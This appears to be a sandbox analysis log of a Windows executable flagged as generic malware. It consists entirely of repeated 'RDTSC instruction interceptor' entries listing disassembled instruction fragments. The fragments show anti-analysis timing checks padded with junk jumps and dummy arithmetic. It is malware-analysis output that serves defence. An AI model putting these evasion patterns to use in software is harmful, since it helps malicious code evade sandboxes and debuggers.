Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640EEF second address: 5640F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F449CEB073Eh 0x00000011 xor eax, 69D1B0C8h 0x00000017 jmp 00007F449CEB073Bh 0x0000001c popfd 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, 6109h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620548 second address: 5620558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620558 second address: 562055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 562055C second address: 56205A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F449CC63D7Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx esi, di 0x00000013 mov cx, di 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F449CC63D85h 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F449CC63D7Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56205A5 second address: 56205CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F449CEB073Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56205CC second address: 562060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d jmp 00007F449CC63D7Eh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F449CC63D87h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 562060D second address: 5620613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620613 second address: 5620617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600506 second address: 560050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 560050C second address: 5600538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F449CC63D80h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, esi 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600538 second address: 560053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 560053E second address: 5600594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CC63D84h 0x00000013 xor eax, 145F0F38h 0x00000019 jmp 00007F449CC63D7Bh 0x0000001e popfd 0x0000001f push esi 0x00000020 mov ecx, edi 0x00000022 pop edx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov di, 44FEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600594 second address: 5600599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5600599 second address: 56005AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56005AE second address: 56005CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620009 second address: 5620031 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CC63D7Eh 0x00000008 add cx, 9D58h 0x0000000d jmp 00007F449CC63D7Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620031 second address: 5620035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620035 second address: 5620039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620039 second address: 5620047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620047 second address: 5620064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5620064 second address: 56200DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F449CEB0741h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F449CEB073Ch 0x00000017 add eax, 146BCC78h 0x0000001d jmp 00007F449CEB073Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F449CEB0748h 0x00000029 xor esi, 0006E6D8h 0x0000002f jmp 00007F449CEB073Bh 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 pushad 0x00000039 mov dh, ah 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640667 second address: 564066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 564066D second address: 5640699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CEB0747h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640699 second address: 56406C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 26h 0x00000005 mov si, 3087h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F449CC63D88h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56406C0 second address: 5640714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F449CEB0746h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 jmp 00007F449CEB073Eh 0x00000017 push ecx 0x00000018 mov cl, dl 0x0000001a pop esi 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F449CEB0745h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640714 second address: 564073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F449CC63D7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 564073B second address: 5640741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640741 second address: 5640745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5640745 second address: 56407C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d jmp 00007F449CEB073Fh 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 call 00007F449CEB0744h 0x0000001a mov dx, si 0x0000001d pop esi 0x0000001e pushfd 0x0000001f jmp 00007F449CEB0747h 0x00000024 and ah, FFFFFF8Eh 0x00000027 jmp 00007F449CEB0749h 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F450E7A38EAh 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F449CEB073Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56408B3 second address: 56408B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56408B9 second address: 56408BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F00B6 second address: 55F00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F00BA second address: 55F00F4 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F449CEB0744h 0x0000000b jmp 00007F449CEB0742h 0x00000010 pop ecx 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 mov ecx, 1794080Fh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F00F4 second address: 55F0108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D80h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0108 second address: 55F0166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CEB0744h 0x00000013 adc al, 00000018h 0x00000016 jmp 00007F449CEB073Bh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov ebx, esi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F449CEB0741h 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ecx 0x0000002c movsx ebx, ax 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ebx, 7B454466h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0166 second address: 55F01D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CC63D87h 0x00000008 add ecx, 5E8BEEEEh 0x0000000e jmp 00007F449CC63D89h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a jmp 00007F449CC63D7Eh 0x0000001f xchg eax, esi 0x00000020 jmp 00007F449CC63D80h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F449CC63D7Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F01D6 second address: 55F022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d pushfd 0x0000000e jmp 00007F449CEB0740h 0x00000013 add ecx, 2C69DB28h 0x00000019 jmp 00007F449CEB073Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 jmp 00007F449CEB0746h 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F022D second address: 55F024A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F024A second address: 55F02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F449CEB0747h 0x00000009 xor si, 0F2Eh 0x0000000e jmp 00007F449CEB0749h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F449CEB0747h 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F449CEB0742h 0x00000029 adc ax, B708h 0x0000002e jmp 00007F449CEB073Bh 0x00000033 popfd 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F02C9 second address: 55F02D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx esi, dx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F02D4 second address: 55F0340 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CEB0747h 0x00000008 adc eax, 3BA37FFEh 0x0000000e jmp 00007F449CEB0749h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007F449CEB073Eh 0x0000001e je 00007F450E7EEA2Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F449CEB0747h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0340 second address: 55F0346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0346 second address: 55F034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F034A second address: 55F034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F034E second address: 55F03F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F449CEB0747h 0x00000014 je 00007F450E7EE9EDh 0x0000001a jmp 00007F449CEB0746h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 jmp 00007F449CEB0740h 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b call 00007F449CEB073Eh 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F449CEB0747h 0x0000003b xor eax, 4C70E78Eh 0x00000041 jmp 00007F449CEB0749h 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F03F2 second address: 55F043B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1C5A6297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test edx, 61000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F449CC63D7Fh 0x00000019 add ecx, 0768C59Eh 0x0000001f jmp 00007F449CC63D89h 0x00000024 popfd 0x00000025 mov ecx, 0EF6ED67h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F043B second address: 55F046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F450E7EE972h 0x0000000f jmp 00007F449CEB073Eh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, 54A83C3Fh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E08DB second address: 55E093A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F449CC63D7Ah 0x00000012 xor cl, 00000038h 0x00000015 jmp 00007F449CC63D7Bh 0x0000001a popfd 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f push ebx 0x00000020 mov ebx, esi 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b mov dx, si 0x0000002e popad 0x0000002f and esp, FFFFFFF8h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007F449CC63D7Fh 0x0000003a pop eax 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E093A second address: 55E0969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F449CEB0742h 0x00000008 pop esi 0x00000009 call 00007F449CEB073Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop esi 0x00000018 mov ax, bx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0969 second address: 55E096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E096F second address: 55E0973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0973 second address: 55E0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0977 second address: 55E09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c call 00007F449CEB073Ah 0x00000011 push eax 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007F449CEB0747h 0x0000001a or ax, 737Eh 0x0000001f jmp 00007F449CEB0749h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b push eax 0x0000002c mov esi, edx 0x0000002e pop edi 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F449CEB0741h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F449CEB073Dh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E09F4 second address: 55E09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E09FA second address: 55E0A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F449CEB0746h 0x00000013 sub ebx, ebx 0x00000015 pushad 0x00000016 mov bl, 43h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b jmp 00007F449CEB0742h 0x00000020 je 00007F450E7F607Eh 0x00000026 pushad 0x00000027 mov ax, E29Dh 0x0000002b popad 0x0000002c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000033 jmp 00007F449CEB073Fh 0x00000038 mov ecx, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F449CEB0745h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0A81 second address: 55E0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F450E5A9683h 0x0000000f jmp 00007F449CC63D7Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0AB7 second address: 55E0ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0ABB second address: 55E0ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0ABF second address: 55E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0AC5 second address: 55E0AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0AD4 second address: 55E0B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F450E7F5FF9h 0x00000011 pushad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop eax 0x00000015 pop edx 0x00000016 call 00007F449CEB0744h 0x0000001b pop edx 0x0000001c popad 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 jmp 00007F449CEB073Ch 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F449CEB0740h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F449CEB073Eh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0B45 second address: 55E0B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F449CC63D86h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx ecx, di 0x00000016 rdtsc
